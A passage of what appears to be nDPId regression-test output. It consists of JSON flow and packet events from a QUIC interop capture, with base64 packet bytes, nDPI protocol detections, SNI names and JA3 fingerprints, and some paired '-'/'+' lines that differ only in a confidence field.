H\/ftpi+zlnKzZWJcJk7cxUnYiLi2m\/syIsVA+rAGJ4eeYI0XnnqQO4AvGYQTCUgtaiahKO7UOHl88kFcJG4D8pQg2wwb5607JGDUPMhSYXsNIwTaOjnaJDy919gMoDn26JaGel3R8iazejn1O\/DzxXDINb0MonstAugqKgKVKjzgLZ\/csTsyHaMRIb0aSATuia50Le8I3Ve5TbTrO\/bIUVjBtgTrRKF9beL0OL2aHMhnVOyvZCYm2Rfh+hzhENK+ndpIFgdC09Qc1PCFaAc\/iWtEnOkRAICRVP\/n2wewDV4ofdczPB2YLwTo\/A4bp3k9J39KVcL+jkeKQH9hK9CryMQU2J\/VOD96l9ePlxO+jxkFCQ59EYKnbqkDYSz689nm86kaU5Ehu7UNB2XjaenWSjg+6wrw=="} 02151{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":90,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":26,"flow_packet_id":2,"flow_last_seen":1603816434752,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434752,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAU1dAAEARXy7AqAGAjOM0XJOYAbsE7NI+zwoKCgoI8EYvtCcjifcAAETSbBDdIICaEFzEG1iH2xrezIkmzc81Se7Om4pMqi+fkG1ee5cmCW03EDIZCCsKAvFcaFK0xOPuVpbYZPxd25c0VKDC2\/IuslwjOlp8bug5TVX8ayHsiTo+lsvxl1UQybYSPktQa6tD8aJ1SYoje\/TUY\/5v\/R2x3Qgs8EMkrwm3yX346YWdgmSm1p7ceKPEy+zG5LRvC9shuVP1fHGwJ+1fA5BlvICvwLYIOkfS5qSoKKUy0u4Zz9f3Dl8wvOnZhXCK6i8j4NlIpdZHu5RJiAsAZ4LK1nC+Hkny64Ae6XYMfX+bXXmhr20i5ZKonuPmoXhEkpwdnfR7Q+F6EhXJUuuaYdMH\/IWPcTw7L1PQOQRTBPiChmKnH9chbLTQGT2spRUw6ZUEwVFq4In3Weuzal0iqS\/0+Qhc+H5LZTfRP3k77cm2bTwA3v9yZps\/N8GHeBgerU\/GibGyvQfEIGnBs4SP6XvADxPaOf9Do6K3NWxPainQ6ROxxs18RzpwAqfNwr4czNzHmge9hVsXC2jkjt+a3iuT2VTvtgYP\/gg3wHLLEejB8ULg0YDhFTSwR5yZE+PblWTw\/h1zub\/pMrOiBxxazdMQ6Cnlz1xT+HwIG9hofXF2+e7REuF5bc+tHJIAxGxRRDEZiMKISCqpeRlWCWzB2x1mmKE\/KOsosvWRujnwCM1KnVuycB6dQCV8X5XgqFkoCYNSzpxTxn5s75i07w6T3iQzjZ7RhS6EVLmvqncx43bMihbC16QzKChHTteVef548eeTYH\/HqbZPAD8YiWnymAmXsIshT9ZrxL58BUWA8AOTB75ExBEpSWvCr6cdH9tmHTnFX+iAHfgQ+SXuDcA8Yh6Ch37H7iJkjIlyFlV0xYK80\/8rLLX9Fi16hMEw4MsMSJoCvgH1JkfA2nunYMhjsU2UTxS5kbVKkx14WrqJvIAkV1s24F3JhhnfrjqaA\/+WQCy6FO4gWrpnAldrYzL2M62GkNRWliggV7ygB87oMNLaAmKZ5PPWr4N7Ua\/KkdB4nYZv97Cgzy\/7FwISfaGW02358adB++VWymI6DWtw2+GpWB3k0kCTmUYA6S
cuXne\/RAGeAonjWWbVkNYIk9hKz39J2Uz8YIvzxBUfOGU8GZZmVIYhs+LqHfeGeKbbCDVrdghS8AtfkpMJaXaNuqlKxMd0+QmH708rOIK59+ExcbrFRuuFCV+Y2kBwCFjNISkM\/hxKEL3li6mt6HDE6ObfY03fEoJ8sHxvuyXUyqUrbYA+\/+769MwVZnJvR3BgYsDQ7yyssPJx61jOW9\/\/ZJaUpoeTMs+LvTpOaO3aOGoys7HzhFtjxPpaMeuy6J8rvRGlDmpFIbJDQSikU42BVwHFgIiJEdtXmpWvL6UjR9gEnH7F4leVc6kZRbkH8JQU7saam7b+aLACqy8QGiFKLZZ79Su9BVo3hXx4V\/a9UOG0fwWICYP2rWjoSlMM1D8LD3JyXD\/xHI05oU4AlfqIPRE\/pZQIZghaIHZV\/ga\/hvwGvtrr60MW42GcZ7safTYI3OMKFIcoVKABl6HRXDdV5P2Rt+B44fCqh8Rx5j1GHzSW\/rGFP+xPOA0hzb72SyDr1nPrWA2ufiZWLD7rTJqxk+zP0NWdN1W8Ig7keNnXWv4QL9x\/\/g=="} 00598{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02155{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_packet_id":1,"flow_last_seen":1603816434756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434756,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAOvlAAEARQxzAqAGAA3nyNtCaEVIE7JFKxgoKCgoILW5Ke\/Z2fngAAETSF+9lWl21JTgtfVHZ5XMFAV5iwNh8QJikNlPYLLcL257g14TEszj6j7gT+sZNJ3RW6GlkGKI0cLTiGhA4DZXSY2CRRkQV8aus3zX9x+wV2RPvN+4eYITQBIblhzLx6SrfCRaIuMd\/dIvuprgHzspSsGPsDVaFWE5RHWm8PvIf\/7WDS2AteLmXnCclnhwiNiESFMU\/JfLfx1BGNZvT2HLZlWqxE\/QH\/8leGOFh4OQdOMgDcrWH2aq0ZIEKOcT+22+SBNS+RXSivQkzWAWGACCn3yDlD4LrYX0EufA2pWqvz0bhI1bD1bMjQNQXTpb0IRYB\/IP9pUSfcl09eg\/8nkbY+WxJsi7\/OumDvzxFqxy1vKTBHoCkKcZU6KzCeDnpcN4UpeF\/P9Su7Hbnq6Oiu4kYT7w5TEYJlfr6hPZSINzK1N08yrm8sF5N1X+BgIp1nZKHO3z9qBo5uTSd7eUgib\/5hEBZVUjZfzcENhMxZ3iQWwxtVBdr1MPVUb\/fAHf\/LyB43r9qDPa9CjQlM9LQ10V7PuMS1mZ\/FoYoEt5+Lt+cJHI5bVFxc5jzohk+GAitdRUtpfiTuEwM1BTukQDiBma4oP3e14IOsjoG1G6JReouNpkBgpuToJ+jAbUrib7kmXzQdUA7kbNqdY9YbE3amA8AbTm+9U8XVMYkeWFdsFBWMWYdsARDe\/wNxFennwMBsN1VI\/Sf2kdpBwmikma9+VOfFyk1+k2sHTPIlSkVm3zjzWfLNM1PgYnwDxsauAlC6hmm0JtKmTtkv+Pn\/\/bRNz47TPwG\/lMWs1GWc\/Duiv2CyU27DrRqkZl9eIkxpCPq+lhf64B8FwAcAY126ezwgYeSIj\/2BPVLzj6uWaHdPFiHkcYmsVRVcNxcn7SbmC6vMu39440UH8ewpx4045LjoYhYGYD9wbNo\/kPCLdYB5lMNkMJTlPPmNe98ODz2WRVDN9gK0zjD8fscveFE1Bpk8Tltq8z87BasUF4e83PNj3KD2dMD7X3GtxvbnR3cIGT3a57NON24InRM\/nwZHwL2bk877r1hTuhvugTQiJQZIW+R7Cd76AgAWAnog5NJv6qFjoKKfxT4AV2tDLzRyjkMMrHebIWYVqs1aklZ5d7wxUYLamAar0CN+WpRkYSzgamBAcwe7BSMa1vimlqjo\/6IlbVmFAty4ZoLhk1JPUo0OTDJGfg7G5ACascLpelBjrrhC8q2UQKF8audmNUZRXmNP+namQx8VwfIgH5YHylOs57ZtHfGy6hvAJo\/Tqvp\/umN87FBHWfLNRT8fGjmReoFRPTt1LBgsiQauA98uLlL\/MhK3zSkvFJb8TpBWg0yrTs+EkEfcIYy\/54O1JGnSBS8+4f\/1DKIa1jmhY4F7hcK\/Y\/Zi33FgbmmvzZ+cspy2SIEhxePsUH3DOdZcJPxMiL9n2teu3XWpEwymkPM3I7Kauv6WrFEPbeyTEqbxV\/7RpTQ21VJA+vSCdBrxnvlGaubOeoQa
S4+J\/ugEvRReICuHUPNCmQAnXPbJmcvvOj5p4u5B1t7PBGR3R1kOZNNBIvoThwX9CAlMfPhMMsjct7r8pVUeMkYfmNf8DVqscAvJ5\/vInV2if80iUDSzxy3mS373dztl6IVts0qx7XYaK5V4uL6xfDViQ=="} -01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": {"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01010{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":91,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":64,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434756,"flow_last_seen":1603816434756,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434756,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"3.121.242.54","src_port":53402,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC.AmazonAWS","breed":"Acceptable","category":"Cloud"},"quic": 
{"client_requested_server_name":"ietf.akaquic.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 02152{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":92,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":28,"flow_packet_id":2,"flow_last_seen":1603816434756,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434756,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAwbRAAEAR5e\/AqAGAwb4KYsH6AbsE7NgwygoKCgoIc5O0PcfI+J8AAETSgTdR0pp7ROFzny7v80GZO+tdgWE1YYvBBVpTfYCLLZ9LR2R\/NMsrhl9CtsbdCKSqQlM9jeDSd7avtFbwkZgUMsGjQSFGIrauocKoeR\/IYUv\/3yqId1gln9QOjFOA7Vx3pZz\/40HjTDz++wnocf0Q7LKFbnIVVlAkyHprEOHxkx31yKlE1OrKPFXX64LJtMBzJGNe1ikJ4DBZc3CxM4VAmWh6jZ6Xziu1T48Y9Jp1rXJLZkDZluz9DNypT19E9aFE2QAE2YffnA08t2CC0Dav\/nelE7OXLvT3\/abxcTvv6lkWQ7Ws\/OGhflJV6pbd8DOAJlm41dw48U7866L\/ZVnZQGhC+qy29Rf0f9z7LTwYqeUnFBlTnrWIJUDejmyBK0xmX71p+M4ZDQYk6ksEN7ys9IhEK+0Ik4NF3m6iw+Y3srEwTIzK7SMuEUaqxHAnsnY0cY7xUBPiPgfPBbiLOeDS23803rHtAW6t+pcVbYzcUhLC5i4Fhsy5HB7swuOTaDalPrb1ks0Osqlmdnwi+VtFXIfWY5hiA\/takn+M6zgv2Z5TIeGz5PwD\/mNhYevqBSzxfqtF6pqWG4u\/KRjbRiKsndJKZWqgEurVo18heo2c6BuDo0f63l9uVIrESW645Q3fwcjj5n0WWKE8\/gOmB1q+Qfeb5YwzG2mkb0uuRf1dVhHaEpflcJ4\/TP64ezBPm2PEqdUJ98ani+HAdCRefhilKHlZCp8FaM0g6fLSIWNKgyXd08cPKg3kQr1QKPyCDeevRCjLROEYKMQBfMcVsYelRUae3sfcDjOm3duGl9ZwBYRTuhqBGmO8BgPbJTCOUP3SnFPjNHZReb65nPAq5CmaErExRB3aqj2X70FK4POxZDcdB2SCLeNQjD0gAdoPMDjy6TU8QbOW6emahG\/pm2XLGB82paRNLQ1UrajFFljlEad6px4jnFkmQswkS1ZCAcPuyjYtBQOoVyU6Jn8IET5bSZAQYtSzhJcRSsotN89chVt8BOmx9WoAiAY6LsHVmGCH8fyiVJ8R96liGv\/mCcZB6Oi41IwhqNraSx\/YHNb8PDeqgVZnzU7HOxgMto9BkhGXVAa\/MDhpy7ONbZFtXLugZH\/GeA4uKx4T\/QjSGOy8\/I8tKHhy1ciKQVx\/4efbfMnze1\/7wiD29p7nKFEe8jhCs0tUTtvbs5svZDkGpMLh\/X4M8hVxSKoXJ4GInFSKgl6TdVamGbNzyLxWmQUTAYnTn24BPh82ABwBHi8IX8bKxOnTE9ArtO1ncpBuGK6utDYd+flGgrwW8Kx3EAq
CtI+xt3hxI1lVVBS5mqinEpT4rI7UFt6bivyn3w8QLN2BAypCK2nDcT4jrgs2l16Qbqcq5B1aHCyILvPoswAdCLirW7pESSTDoJJLaY3+F0tLUXrHW1QCvM\/i6MkbViFrAX1Wv2DuS4QGedw\/jPkFjn0PVCpFH1LNlSl\/mq7ojJPIzqm4YoISxxdl92D1MuRAOkcGfHDjHzu2gXU4R2SOjkBJKT78Z0m14Jd3agw7f8zNErlWf3mQN\/cPgefBr3GQB\/5hkj9h7mtqO0XsqbQtHpUzt2Y\/IzySgy2h3inpKHrAmHMy7nBwaqDcL8noSXoChoeTFZAF+yuWHR0EPcyX\/dJQEW5Avw=="} 00648{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
02150{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_packet_id":1,"flow_last_seen":1603816434764,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":1294,"pkt_l4_len":1240,"thread_ts_msec":1603816434764,"pkt":"pJGxgjQ5PKn0qB\/sht1gAVbOBNgRQCABCwcKydWupNP+R2kegH0gAUgAeBcBAb52Tv\/+BGMdz5QRUQTYJfbICgoKCghA0fDpGJ\/Z4QAARL42MmGE7LT7K7Ql+V7EQ3yWatv5MRpdEw0GoTR5NQSX65ds5UbmlVEnPiT6ugJBO3avrGIdm9NfC0YolC+M7h3Dd+R8rmFmbMufRy7tEXwOSANvtASfChD2QtW7IUdoUpURW\/ybH6H3HL74XAiUZ9DaKTFRCIGfbZdMWt8ZGjlM+G0uKJJyI4UiXMqUmldhkusW7Dkb3B5PhdsU4l\/\/nXb1ocHMF5ZO15qTuXpuDw3KLbi7Dk3CU80ZSrgIQRr4QnZY7DqaQqaTgqwsAdQp1wPEsQudwtV3+rldfGptoheCDmbpY8ruZrzgIcViEvjU5I9Ku4MmOSDc008VMVo6UbKXAY8wBkNppH+gKT0zKsJbuYos09RElJKJM+JRSvAd13BS3pf5yKPRjvg+VG7dJIXDCpCzd5HB88akDiSNSvnw\/1jpXEBSCG8CQobh6IKIU7erWpgWufuC2MUeTsj93wERw28DYyL4pZ0SgYLM8R+IuAUGggiToLnDY0lhnQxvWPEyOUmn4NJbPGX\/ycsndCFcb9Jll9Txp36+98fi41gKI+rpvius3\/7rHwBBIC53Dc9XI1Li53E\/tYF3PSb\/g4tqh7YqeuJqy592nH72H7zhGojy0gwXJQ\/hWtpj34Umy89wdwne1tmBbDTsm\/OVEe2Hv8wX1eUxdtqxfSQcfE5EjCaX8x5TsLMsFiA+gnimL9YXpXbCar82EARe4s\/1NGbcVosoctM9nH774rkUWziya9xnPI59V8iborTptEZmzs9opsMwWCSG3SUoMF+XgWmJrobGMEBNgQ6NuDdRKVGnCOz5ViUV8HOdhxWdLar9arspdIIQioDF1eMysE8I5ZwvEkpGFpxtL8pSwMYHtvi38MARaK84JW5F4Q+Z9NKUbjEnyJk4DLBXQDZCAccejGxLIlAEw9mV\/SQqwWMDKPfcgeBYaGkjuKCt9IwYkKfJdCAHGlWbthDy9UAYdzWaLgrHKDwv7KjG08gxv3P2Ay64L+MkxpWRZB3zlpP7475UXQoo5J2b\/TCDguBRfBA\/zwH0ywx+bAC1xX58ocUBgtutOfF0Vqf9ZXqQdWJ\/tYbtk2qPb\/vUKDkYspG2+VZV3S4mHyGQEdK+3+Br++sSHMrwkXpKY231omxX2tF0BL0Bxb\/XFoQnF0zVMDi6yl7EdOkVYJKzpCkpByrrFblgbC6aH5tGZmLBBsnQ9oNmcYgP6L4\/rCjc9wp9OI6Dpp\/kCf0+0QdRr65NauWVYS3fzTceAW7h1rV7piIkaCm\/ktLnQ0CjV4yXbM4EAQ\/1J3s6F5an9AUjsSqU7bHdat7EQLbygAV3b2dabdxj5om9WQRt0joYLuxTvD8zwyOedLxW1wTxiQF1SimJGbjZ\/VbtHbirvwE3YrWoKzszq610qQdSeVcciVMkJn8\/frGZPOF+kV+ihka4sCmdlV4EIQk1LeOGrlYlQ6fpIafv8Fxge7YrHQD
BRMDZfuEMvNEoQTdfeyjVZwZQIQqYpN1426QLcvTfeGNyVfnI\/BbfhWbK8vegWPhhtQELUYrkCHe43wuMJDkpCyHET\/GRFZPr3UO+sKZLIuMEzbgtFP8BywWzvtpZIPTbuoW\/fNEsBA9hvwy1MQ=="} -01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +01045{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":93,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":65,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434764,"flow_last_seen":1603816434764,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1232,"flow_tot_l4_payload_len":1232,"flow_avg_l4_payload_len":1232,"midstream":0,"thread_ts_msec":1603816434764,"l3_proto":"ip6","src_ip":"2001:b07:ac9:d5ae:a4d3:fe47:691e:807d","dst_ip":"2001:4800:7817:101:be76:4eff:fe04:631d","src_port":53140,"dst_port":4433,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": 
{"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.ogre.com","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 00599{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 02157{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_packet_id":1,"flow_last_seen":1603816434765,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUAU3xAAEARXwnAqAGAjOM0XOJGEVIE7OZyxwoKCgoIVNEfWrpr6t8AAETShzjiz2D78m1qpQ+wdRdnpG0LI97NN9w\/zKLTNwbycXDRt9x16mx5gVIiYU9my7Ewd3ZQMG74RKzp5yqjf1swV34ZhT\/6a6RECEeuXIhfq5HIaUvnylxvuq5Ar2tLEHKFSp+lL3+2mCGKG\/aNYIIMA9OUhG2opUeuB2l5mNW6BfknYi6bDFHQDD1kdTaXvzq60RpfCfERji\/a12lQL6ybflc1AUHJdy355ohjy1PIdK24siM83Pzy3WhuqqXhu48NlkiWBwzRIc3QwNG05XWtibPZpt+rnEgQ+dX5n3b+VdVkbT1SCRuZXy4KNB1O35Lr9kd9\/8w+iJRgvFGDJ1gPEsh0qR0CocMn8hmur7qxG29GbjVMp7R1NSj2eAOtmvYpLRwpEXgHuZyaQ1wjCTKff2\/madFWTA4XUYv4fZGglZSmwIF\/drNbz5S3P\/iWcoMFEHkI4sVFj9ZYFd4B3L8Ih2KOMfq0bJT\/WfJrXj4M4zI4ZrVBE7HjqFO+Xl4tQchegf9m36aJmP9rCIyTgms9JLdAWw4p9HwzAtYzEsN7etsiFMbBGYxWytAD85x3V9BiLZ0tRaEDbZVSI3dKqLBjOACNgGbIysz\/M5PX6bbnVEJL+rpXP4dfmzf\/v
yIoXSLGK\/35Ot0RpvgHsUdk1M1JiJ\/w0LW\/ca8oRdqHyGl\/0OHcNoRXWU9uCpfJhoCR17fY7d\/8uGaioJukkywUyDy4lEoJon8wuutdoFaZ2G1NQYMqLk2L9BSwK6uXlh\/KFqoktCfkCzS\/xf+XdyqvzCmUAccDyVcTW2Lvm6Iydjjcz17WgP2sboaA9M+jrUXfYeNBGU+gooCH\/ra1qqj6hZV+ycQaUnNe1GLXG68adoCLMAH3j+oxneUkPOBiO5E\/EF5WMPYRqDPOKxnvKYyV0lEoyBg27SjzbmIsvSP3tH7+YEc5r+OkK5iuBgQnkGchz2TXPmjupTCg7Xojg+c2Vl21XIeYUg5zp5dqk+Dg1R9d\/NVFrsh0doLMsqN8QHWUOatOJlm\/\/hWn7+iCSCBW1hRFoljw2OaG0E\/WHGtKJCH2ZhTW\/OlsWDZ1I6a9AalNu2a3QLqufVsas9PvBAL98YjcgSJ2vBIk\/BVRBpG1Q\/rHLLGdBQB\/\/fZj9y5wySLqEy0sx93+y3Y1YIBdxSNqeVQx\/fJpwJre6YpAYG9B9bZ\/BhXdwe1PHHhhhh+Tc0H6ljXzAZf5EDPA4QtQAjr8TpYSQuwb\/souaXFbGTPfik1Mu8mHXJ7chWN7BzwY6WVcDvctTf5wcun\/ot9mUzugsNNaZfRJbJao7Y6eGCUXHAEDWUWwm6eFYQim4\/i3o6CdH9tbSa5KMv36T6nVCkpY+qDyBJdXUmrtiozwIoULbVWC7vKc4k21qmL36sDhhn10y6PN4bIg1\/diWwWYCyWvERVVVw+kY2BYCLC6p8eQ4ktUYbvTDjH7p17NqO7ef3HSSFWp67hCGKfd+ge3gy9+0Ke6znAKoZn3gft7e4Qngv6MCc\/8gqKo6NfPX0NUiWvPO5U1BDl2yWaNt0QFBBfKLxj+uxMZfebHky9N1aDOeVaIQ9eYOanbE2+OeMk1d8+h4d5hGTbyyYZ3xpCnfIP7rR2Q8OBY5Js9LjU+ch2BSmUmNfrrjQ=="} -00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"4":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": 
{"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} +00999{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":94,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":66,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1603816434765,"flow_last_seen":1603816434765,"flow_idle_time":200000,"flow_min_l4_payload_len":1252,"flow_max_l4_payload_len":1252,"flow_tot_l4_payload_len":1252,"flow_avg_l4_payload_len":1252,"midstream":0,"thread_ts_msec":1603816434765,"l3_proto":"ip4","src_ip":"192.168.1.128","dst_ip":"140.227.52.92","src_port":57926,"dst_port":4434,"l4_proto":"udp","ndpi": {"flow_risk": {"5": {"risk":"Known Proto on Non Std Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}}},"confidence": {"6":"DPI"},"proto":"QUIC","breed":"Acceptable","category":"Web"},"quic": {"client_requested_server_name":"quic.examp1e.net","version":"TLSv1.3","alpn":"hq-30,h3-30,hq-29,h3-29,hq-28,h3-28,hq-27,h3-27","ja3":"7d9e7f6dec1cb1dd8b79d72b1366b6cf","tls_supported_versions":"TLSv1.3"}} 
02154{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":95,"source":"quic_interop_V.pcapng","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1603816434765,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1294,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1294,"pkt_l4_len":1260,"thread_ts_msec":1603816434765,"pkt":"pJGxgjQ5PKn0qB\/sCABFAAUALHVAAEARX6PAqAGAKHC\/PLT+AbsE7IqdzwoKCgoIe34skUb\/aLsAAETSJwiqldCG5d2DtH8UDlA+BP\/n+Hka9N9gLDvV00Jk\/OgePJAsiH3HrqXWf6W0XTXk7Pu2p+CFv9C0iF2fTa1ifkWOzj7YZz+hGLr31Ia3KbnzB86fFFCNPLMCgtr6arstfjJ4xI\/CQupOIVcMsg4IO6vzq1hO5uX8ALX13N2Nd4Yxx9Z3IbnXFpgI6JLk1uKVCyweJMlz+LOrhN3PHNyVHIt6alONhgWpEqUlKgTnNS9lCZd9JNENA+veQK+6gvIe2KJWpJlHdMZNI+3fjJnabXQaUxPQIMc0ZI8dZFlz3L059EqhvD2lc8\/naUxdGHznqVZzO\/gUeKnLROfZL6yJDTZiKzf+md1VYLBmBSCdsuQZ7oHBg0w7SSzXTvhRTic8g6kHUcynm9My8rvP3N1cyhHeHYoVTI3hh1p6dM2epSa1QGAI6JHSwnUF1\/